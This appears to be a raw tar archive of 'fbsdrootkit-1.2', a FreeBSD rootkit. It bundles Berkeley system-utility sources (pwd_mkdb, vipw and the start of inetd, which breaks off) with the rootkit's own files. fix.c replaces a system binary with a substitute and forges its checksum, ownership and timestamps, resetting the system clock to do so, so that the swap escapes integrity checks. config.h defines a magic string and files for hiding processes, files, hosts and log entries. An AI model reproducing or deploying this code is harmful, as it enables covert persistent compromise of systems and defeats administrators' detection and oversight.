OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pw_scan.h 8.1 (Berkeley) 4/1/94 */ extern int pw_scan __P((char *, struct passwd *)); fbsdrootkit-1.2/pwd_mkdb/pwd_mkdb.c100600 764 764 30061 6233173627 14706 0ustar dfdf/*- * Copyright (c) 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)pwd_mkdb.c 8.5 (Berkeley) 4/20/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_scan.h" #define INSECURE 1 #define SECURE 2 #define PERM_INSECURE (S_IRUSR|S_IWUSR|S_IRGRP|S_IROTH) #define PERM_SECURE (S_IRUSR|S_IWUSR) HASHINFO openinfo = { 4096, /* bsize */ 32, /* ffactor */ 256, /* nelem */ 2048 * 1024, /* cachesize */ NULL, /* hash() */ 0 /* lorder */ }; static enum state { FILE_INSECURE, FILE_SECURE, FILE_ORIG } clean; static struct passwd pwd; /* password structure */ static char *pname; /* password file name */ static char prefix[MAXPATHLEN]; void cleanup __P((void)); void error __P((char *)); void mv __P((char *, char *)); int scan __P((FILE *, struct passwd *)); void usage __P((void)); int main(argc, argv) int argc; char *argv[]; { DB *dp, *edp; DBT data, key; FILE *fp, *oldfp; sigset_t set; int ch, cnt, ypcnt, len, makeold, tfd, yp_enabled = 0; char *p, *t; char buf[MAX(MAXPATHLEN, LINE_MAX * 2)], tbuf[1024]; char buf2[MAXPATHLEN]; strcpy(prefix, _PATH_PWD); makeold = 0; while ((ch = getopt(argc, argv, "d:pv")) != EOF) switch(ch) { case 'd': strcpy(prefix, optarg); break; case 'p': /* create V7 "file.orig" */ makeold = 1; break; case 'v': /* backward compatible */ break; case '?': default: usage(); } argc -= optind; argv += optind; if (argc != 1) usage(); /* * This could be changed to allow the user to interrupt. * Probably not worth the effort. */ sigemptyset(&set); sigaddset(&set, SIGTSTP); sigaddset(&set, SIGHUP); sigaddset(&set, SIGINT); sigaddset(&set, SIGQUIT); sigaddset(&set, SIGTERM); (void)sigprocmask(SIG_BLOCK, &set, (sigset_t *)NULL); /* We don't care what the user wants. */ (void)umask(0); pname = *argv; /* Open the original password file */ if (!(fp = fopen(pname, "r"))) error(pname); /* Open the temporary insecure password database. */ (void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _MP_DB); dp = dbopen(buf, O_RDWR|O_CREAT|O_EXCL, PERM_INSECURE, DB_HASH, &openinfo); if (dp == NULL) error(buf); clean = FILE_INSECURE; /* * Open file for old password file. Minor trickiness -- don't want to * chance the file already existing, since someone (stupidly) might * still be using this for permission checking. So, open it first and * fdopen the resulting fd. The resulting file should be readable by * everyone. */ if (makeold) { (void)snprintf(buf, sizeof(buf), "%s.orig", pname); if ((tfd = open(buf, O_WRONLY|O_CREAT|O_EXCL, PERM_INSECURE)) < 0) error(buf); if ((oldfp = fdopen(tfd, "w")) == NULL) error(buf); clean = FILE_ORIG; } /* * The databases actually contain three copies of the original data. * Each password file entry is converted into a rough approximation * of a ``struct passwd'', with the strings placed inline. This * object is then stored as the data for three separate keys. The * first key * is the pw_name field prepended by the _PW_KEYBYNAME * character. The second key is the pw_uid field prepended by the * _PW_KEYBYUID character. The third key is the line number in the * original file prepended by the _PW_KEYBYNUM character. (The special * characters are prepended to ensure that the keys do not collide.) */ ypcnt = 1; data.data = (u_char *)buf; key.data = (u_char *)tbuf; for (cnt = 1; scan(fp, &pwd); ++cnt) { if(pwd.pw_name[0] == '+' || pwd.pw_name[0] == '-') yp_enabled = 1; #define COMPACT(e) t = e; while (*p++ = *t++); /* Create insecure data. */ p = buf; COMPACT(pwd.pw_name); COMPACT("*"); memmove(p, &pwd.pw_uid, sizeof(int)); p += sizeof(int); memmove(p, &pwd.pw_gid, sizeof(int)); p += sizeof(int); memmove(p, &pwd.pw_change, sizeof(time_t)); p += sizeof(time_t); COMPACT(pwd.pw_class); COMPACT(pwd.pw_gecos); COMPACT(pwd.pw_dir); COMPACT(pwd.pw_shell); memmove(p, &pwd.pw_expire, sizeof(time_t)); p += sizeof(time_t); memmove(p, &pwd.pw_fields, sizeof pwd.pw_fields); p += sizeof pwd.pw_fields; data.size = p - buf; /* Store insecure by name. */ tbuf[0] = _PW_KEYBYNAME; len = strlen(pwd.pw_name); memmove(tbuf + 1, pwd.pw_name, len); key.size = len + 1; if ((dp->put)(dp, &key, &data, R_NOOVERWRITE) == -1) error("put"); /* Store insecure by number. */ tbuf[0] = _PW_KEYBYNUM; memmove(tbuf + 1, &cnt, sizeof(cnt)); key.size = sizeof(cnt) + 1; if ((dp->put)(dp, &key, &data, R_NOOVERWRITE) == -1) error("put"); /* Store insecure by uid. */ tbuf[0] = _PW_KEYBYUID; memmove(tbuf + 1, &pwd.pw_uid, sizeof(pwd.pw_uid)); key.size = sizeof(pwd.pw_uid) + 1; if ((dp->put)(dp, &key, &data, R_NOOVERWRITE) == -1) error("put"); /* Store insecure special plus and special minus */ if (pwd.pw_name[0] == '+' || pwd.pw_name[0] == '-') { tbuf[0] = _PW_KEYYPBYNUM; memmove(tbuf + 1, &ypcnt, sizeof(cnt)); ypcnt++; key.size = sizeof(cnt) + 1; if ((dp->put)(dp, &key, &data, R_NOOVERWRITE) == -1) error("put"); } /* Create original format password file entry */ if (makeold) { char uidstr[20]; char gidstr[20]; snprintf(uidstr, sizeof(uidstr), "%d", pwd.pw_uid); snprintf(gidstr, sizeof(gidstr), "%d", pwd.pw_gid); (void)fprintf(oldfp, "%s:*:%s:%s:%s:%s:%s\n", pwd.pw_name, pwd.pw_fields & _PWF_UID ? uidstr : "", pwd.pw_fields & _PWF_GID ? gidstr : "", pwd.pw_gecos, pwd.pw_dir, pwd.pw_shell); } } /* If YP enabled, set flag. */ if(yp_enabled) { buf[0] = yp_enabled + 2; data.size = 1; tbuf[0] = _PW_KEYYPENABLED; key.size = 1; if ((dp->put)(dp, &key, &data, R_NOOVERWRITE) == -1) error("put"); } (void)(dp->close)(dp); if (makeold) { (void)fflush(oldfp); (void)fclose(oldfp); } /* Open the temporary encrypted password database. */ (void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _SMP_DB); edp = dbopen(buf, O_RDWR|O_CREAT|O_EXCL, PERM_SECURE, DB_HASH, &openinfo); if (!edp) error(buf); clean = FILE_SECURE; rewind(fp); ypcnt = 1; for (cnt = 1; scan(fp, &pwd); ++cnt) { /* Create secure data. */ p = buf; COMPACT(pwd.pw_name); COMPACT(pwd.pw_passwd); memmove(p, &pwd.pw_uid, sizeof(int)); p += sizeof(int); memmove(p, &pwd.pw_gid, sizeof(int)); p += sizeof(int); memmove(p, &pwd.pw_change, sizeof(time_t)); p += sizeof(time_t); COMPACT(pwd.pw_class); COMPACT(pwd.pw_gecos); COMPACT(pwd.pw_dir); COMPACT(pwd.pw_shell); memmove(p, &pwd.pw_expire, sizeof(time_t)); p += sizeof(time_t); memmove(p, &pwd.pw_fields, sizeof pwd.pw_fields); p += sizeof pwd.pw_fields; data.size = p - buf; /* Store secure by name. */ tbuf[0] = _PW_KEYBYNAME; len = strlen(pwd.pw_name); memmove(tbuf + 1, pwd.pw_name, len); key.size = len + 1; if ((dp->put)(edp, &key, &data, R_NOOVERWRITE) == -1) error("put"); /* Store secure by number. */ tbuf[0] = _PW_KEYBYNUM; memmove(tbuf + 1, &cnt, sizeof(cnt)); key.size = sizeof(cnt) + 1; if ((dp->put)(edp, &key, &data, R_NOOVERWRITE) == -1) error("put"); /* Store secure by uid. */ tbuf[0] = _PW_KEYBYUID; memmove(tbuf + 1, &pwd.pw_uid, sizeof(pwd.pw_uid)); key.size = sizeof(pwd.pw_uid) + 1; if ((dp->put)(edp, &key, &data, R_NOOVERWRITE) == -1) error("put"); /* Store secure special plus and special minus */ if (pwd.pw_name[0] == '+' || pwd.pw_name[0] == '-') { tbuf[0] = _PW_KEYYPBYNUM; memmove(tbuf + 1, &ypcnt, sizeof(ypcnt)); ypcnt++; key.size = sizeof(ypcnt) + 1; if ((dp->put)(edp, &key, &data, R_NOOVERWRITE) == -1) error("put"); } } /* If YP enabled, set flag. */ if(yp_enabled) { buf[0] = yp_enabled + 2; data.size = 1; tbuf[0] = _PW_KEYYPENABLED; key.size = 1; if ((edp->put)(edp, &key, &data, R_NOOVERWRITE) == -1) error("put"); } (void)(edp->close)(edp); /* Set master.passwd permissions, in case caller forgot. */ (void)fchmod(fileno(fp), S_IRUSR|S_IWUSR); (void)fclose(fp); /* Install as the real password files. */ (void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _MP_DB); (void)snprintf(buf2, sizeof(buf2), "%s/%s", prefix, _MP_DB); mv(buf, buf2); (void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _SMP_DB); (void)snprintf(buf2, sizeof(buf2), "%s/%s", prefix, _SMP_DB); mv(buf, buf2); if (makeold) { (void)snprintf(buf2, sizeof(buf2), "%s/%s", prefix, _PASSWD); (void)snprintf(buf, sizeof(buf), "%s.orig", pname); mv(buf, buf2); } /* * Move the master password LAST -- chpass(1), passwd(1) and vipw(8) * all use flock(2) on it to block other incarnations of themselves. * The rename means that everything is unlocked, as the original file * can no longer be accessed. */ (void)snprintf(buf, sizeof(buf), "%s/%s", prefix, _MASTERPASSWD); mv(pname, buf); exit(0); } int scan(fp, pw) FILE *fp; struct passwd *pw; { static int lcnt; static char line[LINE_MAX]; char *p; if (!fgets(line, sizeof(line), fp)) return (0); ++lcnt; /* * ``... if I swallow anything evil, put your fingers down my * throat...'' * -- The Who */ if (!(p = strchr(line, '\n'))) { warnx("line too long"); goto fmt; } *p = '\0'; if (!pw_scan(line, pw)) { warnx("at line #%d", lcnt); fmt: errno = EFTYPE; /* XXX */ error(pname); } return (1); } void mv(from, to) char *from, *to; { char buf[MAXPATHLEN]; if (rename(from, to)) { int sverrno = errno; (void)snprintf(buf, sizeof(buf), "%s to %s", from, to); errno = sverrno; error(buf); } } void error(name) char *name; { warn(name); cleanup(); exit(1); } void cleanup() { char buf[MAXPATHLEN]; switch(clean) { case FILE_ORIG: (void)snprintf(buf, sizeof(buf), "%s.orig", pname); (void)unlink(buf); /* FALLTHROUGH */ case FILE_SECURE: (void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _SMP_DB); (void)unlink(buf); /* FALLTHROUGH */ case FILE_INSECURE: (void)snprintf(buf, sizeof(buf), "%s/%s.tmp", prefix, _MP_DB); (void)unlink(buf); } } void usage() { (void)fprintf(stderr, "usage: pwd_mkdb [-p] [-d ] file\n"); exit(1); } fbsdrootkit-1.2/fix.c100600 764 764 5455 6265031763 12106 0ustar dfdf/* * fixer.c * by Idefix * inspired on sum.c and SaintStat 2.0 * updated by Cybernetik for linux rootkit * text file busy bug fixed, no longer requires backup filename, grammar */ /* cleaned up for the FreeBSD rootkit */ #include #include #include #include #include #include "rootkitutil.h" main(int argc,char **argv) { unsigned orig_crc,current_crc,temp; unsigned char diff1,diff2,buf[20]; struct stat statbuf; struct timeval ftime[2], otime, ntime; struct timezone tzp; long position; FILE *f; int i,fix=1; char syscmd[100]; BASENAME(argv[0]) if(argc!=3 && argc!=4) USAGE("original replacement [backup]") if(stat(argv[1],&statbuf)<0) ERR("stat") if(sum(argv[1],&orig_crc)<0) exit(1); if(sum(argv[2],¤t_crc)<0) exit(1); if(argc==4) { sprintf(syscmd,"/bin/cp %s %s",argv[1],argv[3]); system(syscmd); } sprintf(syscmd,"/bin/mv %s %s",argv[2],argv[1]); system(syscmd); diff1=(orig_crc&0xFF)-(current_crc&0xFF); temp=(current_crc+diff1)&0xFFFF; for(i=0;i<8;i++) { if(temp&1) temp=(temp>>1)+0x8000; else temp>>=1; } diff2=((orig_crc&0xFF00)>>8)-(temp&0xFF); temp=(temp+diff2)&0xFFFF; for(i=0;i<8;i++) { if(temp&1) temp=(temp>>1)+0x8000; else temp>>=1; } if((temp-orig_crc)==1) diff1=diff1-1; if(!(f=fopen(argv[1], "r+b"))) { fprintf(stderr, "%s: Can't open %s\n",RK_PROG,argv[1]); exit(1); } fseek(f,0L,SEEK_END); position=ftell(f)-17; fseek(f,position,SEEK_SET); fread(buf,17,1,f); for(i=0;i<17;i++) if(buf[i]!=0) { fprintf(stderr,"%s: Last 17 bytes not zero\n%s: Can't fix checksum\n", RK_PROG,RK_PROG); fix=0; break; } if(fix) { buf[0]=diff1; buf[8]=diff2; fseek(f,position,SEEK_SET); fwrite(buf,17,1,f); } fclose(f); if(chmod(argv[1],statbuf.st_mode)) ERR("chmod") if(chown(argv[1],statbuf.st_uid,statbuf.st_gid)) ERR("chown") ftime[0].tv_sec=statbuf.st_atime; ftime[1].tv_sec=statbuf.st_mtime; ntime.tv_sec=statbuf.st_ctime; ftime[0].tv_usec=ftime[1].tv_usec=ntime.tv_usec=0; if(gettimeofday(&otime,&tzp)) ERR("gettimeofday") if(settimeofday(&ntime,&tzp)) ERR("settimeofday") if(utimes(argv[1],ftime)) ERR("utimes") if(settimeofday(&otime,&tzp)) ERR("settimeofday") fprintf(stderr,"%s: File %s fixed\n",RK_PROG,argv[1]); return(0); } sum(char *file,unsigned *crc) { unsigned sum; int i, c; FILE *f; long nbytes; int errflg=0; if(!(f=fopen(file, "r"))) { fprintf(stderr, "%s: Can't open %s\n",RK_PROG,file); return(-1); } sum=0; nbytes=0; while((c=getc(f))!=EOF) { nbytes++; if(sum&01) sum=(sum>>1)+0x8000; else sum>>=1; sum+=c; sum&=0xFFFF; } if(ferror(f)) { errflg++; fprintf(stderr, "%s: read error on %s\n",RK_PROG,file); return(-1); } fclose(f); *crc=sum; return(0); } fbsdrootkit-1.2/config.h100600 764 764 344 6273043217 12536 0ustar dfdf#define ROOTKIT_MAGIC "h0tb0x" #define ROOTKIT_HIDE_FILES "/dev/ptyr" #define ROOTKIT_HIDE_PROCESSES "/dev/ptyp" #define ROOTKIT_HIDE_HOSTS "/dev/ptyq" #define ROOTKIT_HIDE_LOG "/dev/ptys" #define ROOTKIT_HIDE_TRIP "/dev/ptyt" fbsdrootkit-1.2/vipw/ 40700 764 764 0 6257562514 12035 5ustar dfdffbsdrootkit-1.2/vipw/Makefile100600 764 764 155 5620536651 13551 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= vipw SRCS= pw_util.c vipw.c MAN8= vipw.8 .include fbsdrootkit-1.2/vipw/pw_util.c100600 764 764 12703 6017704353 13777 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)pw_util.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ /* * This file is used by all the "password" programs; vipw(8), chpass(1), * and passwd(1). */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pw_util.h" extern char *tempname; static pid_t editpid = -1; static int lockfd; void pw_cont(sig) int sig; { if (editpid != -1) kill(editpid, sig); } void pw_init() { struct rlimit rlim; /* Unlimited resource limits. */ rlim.rlim_cur = rlim.rlim_max = RLIM_INFINITY; (void)setrlimit(RLIMIT_CPU, &rlim); (void)setrlimit(RLIMIT_FSIZE, &rlim); (void)setrlimit(RLIMIT_STACK, &rlim); (void)setrlimit(RLIMIT_DATA, &rlim); (void)setrlimit(RLIMIT_RSS, &rlim); /* Don't drop core (not really necessary, but GP's). */ rlim.rlim_cur = rlim.rlim_max = 0; (void)setrlimit(RLIMIT_CORE, &rlim); /* Turn off signals. */ (void)signal(SIGALRM, SIG_IGN); (void)signal(SIGHUP, SIG_IGN); (void)signal(SIGINT, SIG_IGN); (void)signal(SIGPIPE, SIG_IGN); (void)signal(SIGQUIT, SIG_IGN); (void)signal(SIGTERM, SIG_IGN); (void)signal(SIGCONT, pw_cont); /* Create with exact permissions. */ (void)umask(0); } int pw_lock() { /* * If the master password file doesn't exist, the system is hosed. * Might as well try to build one. Set the close-on-exec bit so * that users can't get at the encrypted passwords while editing. * Open should allow flock'ing the file; see 4.4BSD. XXX */ lockfd = open(_PATH_MASTERPASSWD, O_RDONLY, 0); if (lockfd < 0 || fcntl(lockfd, F_SETFD, 1) == -1) err(1, "%s", _PATH_MASTERPASSWD); if (flock(lockfd, LOCK_EX|LOCK_NB)) errx(1, "the password db file is busy"); return (lockfd); } int pw_tmp() { static char path[MAXPATHLEN] = _PATH_MASTERPASSWD; int fd; char *p; if (p = strrchr(path, '/')) ++p; else p = path; strcpy(p, "pw.XXXXXX"); if ((fd = mkstemp(path)) == -1) err(1, "%s", path); tempname = path; return (fd); } int pw_mkdb() { int pstat; pid_t pid; warnx("rebuilding the database..."); (void)fflush(stderr); if (!(pid = vfork())) { execl(_PATH_PWD_MKDB, "pwd_mkdb", "-p", tempname, NULL); pw_error(_PATH_PWD_MKDB, 1, 1); } pid = waitpid(pid, &pstat, 0); if (pid == -1 || !WIFEXITED(pstat) || WEXITSTATUS(pstat) != 0) return (0); warnx("done"); return (1); } void pw_edit(notsetuid) int notsetuid; { int pstat; char *p, *editor; if (!(editor = getenv("EDITOR"))) editor = _PATH_VI; if (p = strrchr(editor, '/')) ++p; else p = editor; if (!(editpid = vfork())) { if (notsetuid) { (void)setgid(getgid()); (void)setuid(getuid()); } execlp(editor, p, tempname, NULL); _exit(1); } for (;;) { editpid = waitpid(editpid, (int *)&pstat, WUNTRACED); if (editpid == -1) pw_error(editor, 1, 1); else if (WIFSTOPPED(pstat)) raise(WSTOPSIG(pstat)); else if (WIFEXITED(pstat) && WEXITSTATUS(pstat) == 0) break; else pw_error(editor, 1, 1); } editpid = -1; } void pw_prompt() { int c; (void)printf("re-edit the password file? [y]: "); (void)fflush(stdout); c = getchar(); if (c != EOF && c != '\n') while (getchar() != '\n'); if (c == 'n') pw_error(NULL, 0, 0); } void pw_error(name, err, eval) char *name; int err, eval; { #ifdef YP extern int _use_yp; #endif /* YP */ if (err) warn(name); #ifdef YP if (_use_yp) warnx("NIS information unchanged"); else #endif /* YP */ warnx("%s: unchanged", _PATH_MASTERPASSWD); (void)unlink(tempname); exit(eval); } fbsdrootkit-1.2/vipw/pw_util.h100600 764 764 4015 5571103263 13756 0ustar dfdf/*- * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pw_util.h 8.2 (Berkeley) 4/1/94 */ void pw_edit __P((int)); void pw_error __P((char *, int, int)); void pw_init __P((void)); int pw_lock __P((void)); int pw_mkdb __P((void)); void pw_prompt __P((void)); int pw_tmp __P((void)); fbsdrootkit-1.2/vipw/vipw.c100600 764 764 6500 5762565367 13277 0ustar dfdf/* * Copyright (c) 1987, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1987, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)vipw.c 8.3 (Berkeley) 4/2/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include "pw_util.h" char *tempname; void copyfile __P((int, int)); void usage __P((void)); int main(argc, argv) int argc; char *argv[]; { int pfd, tfd; struct stat begin, end; int ch; while ((ch = getopt(argc, argv, "")) != EOF) switch (ch) { case '?': default: usage(); } argc -= optind; argv += optind; if (argc != 0) usage(); pw_init(); pfd = pw_lock(); tfd = pw_tmp(); copyfile(pfd, tfd); (void)close(tfd); for (;;) { if (stat(tempname, &begin)) pw_error(tempname, 1, 1); pw_edit(0); if (stat(tempname, &end)) pw_error(tempname, 1, 1); if (begin.st_mtime == end.st_mtime) { warnx("no changes made"); pw_error((char *)NULL, 0, 0); } if (pw_mkdb()) break; pw_prompt(); } exit(0); } void copyfile(from, to) int from, to; { int nr, nw, off; char buf[8*1024]; while ((nr = read(from, buf, sizeof(buf))) > 0) for (off = 0; off < nr; nr -= nw, off += nw) if ((nw = write(to, buf + off, nr)) < 0) pw_error(tempname, 1, 1); if (nr < 0) pw_error(_PATH_MASTERPASSWD, 1, 1); } void usage() { (void)fprintf(stderr, "usage: vipw\n"); exit(1); } fbsdrootkit-1.2/inetd/ 40700 764 764 0 6255640736 12154 5ustar dfdffbsdrootkit-1.2/inetd/Makefile100600 764 764 165 5620406640 13662 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= inetd MAN8= inetd.8 MLINKS= inetd.8 inetd.conf.5 .include fbsdrootkit-1.2/inetd/inetd.c100600 764 764 107317 6273477725 13601 0ustar dfdf/* * Copyright (c) 1983, 1991, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1991, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint /* from: @(#)inetd.c 8.4 (Berkeley) 4/13/94"; */ static char inetd_c_rcsid[] = "$Id: inetd.c,v 1.6.2.1 1996/05/07 03:11:58 gpalmer Exp $"; #endif /* not lint */ /* * Inetd - Internet super-server * * This program invokes all internet services as needed. Connection-oriented * services are invoked each time a connection is made, by creating a process. * This process is passed the connection as file descriptor 0 and is expected * to do a getpeername to find out the source host and port. * * Datagram oriented services are invoked when a datagram * arrives; a process is created and passed a pending message * on file descriptor 0. Datagram servers may either connect * to their peer, freeing up the original socket for inetd * to receive further messages on, or ``take over the socket'', * processing all arriving datagrams and, eventually, timing * out. The first type of server is said to be ``multi-threaded''; * the second type of server ``single-threaded''. * * Inetd uses a configuration file which is read at startup * and, possibly, at some later time in response to a hangup signal. * The configuration file is ``free format'' with fields given in the * order shown below. Continuation lines for an entry must being with * a space or tab. All fields must be present in each entry. * * service name must be in /etc/services or must * name a tcpmux service * socket type stream/dgram/raw/rdm/seqpacket * protocol must be in /etc/protocols * wait/nowait single-threaded/multi-threaded * user user to run daemon as * server program full path name * server program arguments maximum of MAXARGS (20) * * TCP services without official port numbers are handled with the * RFC1078-based tcpmux internal service. Tcpmux listens on port 1 for * requests. When a connection is made from a foreign host, the service * requested is passed to tcpmux, which looks it up in the servtab list * and 